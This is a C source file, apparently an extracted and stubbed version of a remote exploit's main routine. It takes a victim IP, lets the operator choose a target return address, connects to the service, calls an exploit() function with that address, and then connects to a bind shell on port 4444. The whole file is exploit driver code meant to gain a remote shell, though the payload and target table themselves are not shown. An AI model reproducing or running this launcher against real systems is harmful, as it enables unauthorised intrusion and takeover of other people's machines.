
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct in_addr {int dummy; } ;
struct sockaddr_in {int sin_port; struct in_addr sin_addr; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;
struct TYPE_2__ {int num; int ret; char* name; } ;


 int AF_INET ;
 int PORT ;
 int SOCK_STREAM ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int connect_to_bindshell (char*,int) ;
 int exit (int) ;
 int exploit (int,int) ;
 int fprintf (int ,char*,char*) ;
 struct hostent* gethostbyname (char*) ;
 int header () ;
 int htons (int) ;
 int isip (char*) ;
 int printf (char*,...) ;
 int scanf (char*,int*) ;
 int socket (int ,int ,int ) ;
 int stderr ;
 int system (char*) ;
 TYPE_1__* target ;

int
main ( int argc, char* argv[] )
{
 int s, targ, i;
 struct sockaddr_in remote_addr;
 struct hostent* host_addr;

 if ( argc != 2 )
 {
  printf ( "Usage: %s <ip>\n", argv[0] );
  exit ( 1 );
 }
 system ( "clear" );
 header ();
 if ( !isip ( argv[1] ) )
 {
  printf ( "Invalid Target IP!\n" );
  exit ( 1 );
 }
 printf("--[ select target\n");
 for ( i = 0; i < 2; i++ )
  printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name );
 printf ( " >> " );
 scanf ( "%d", &targ );
 if ( targ != 0 )
  if ( targ != 1 )
  {
   printf ( "--[ invalid target!\n" );
   exit ( 1 );
  }
 if ( ( host_addr = gethostbyname ( argv[1] ) ) == ((void*)0) )
 {
  fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
  exit ( 1 );
 }
 remote_addr.sin_family = AF_INET;
 remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
 remote_addr.sin_port = htons ( PORT );

 if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
    {
  printf ( "socket failed!\n" );
  exit ( 1 );
 }
 printf ( "--[ connecting to %s:%u...", argv[1], PORT );
 if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
 {
  printf ( "failed!\n" );
  exit ( 1 );
 }
 printf ( "done!\n" );
 if ( exploit ( s, target[targ].ret ) == 1 )
 {
  printf ( "exploitation FAILED!\n" );
  exit ( 1 );
 }
 close ( s );
 connect_to_bindshell ( argv[1], 4444 );
}
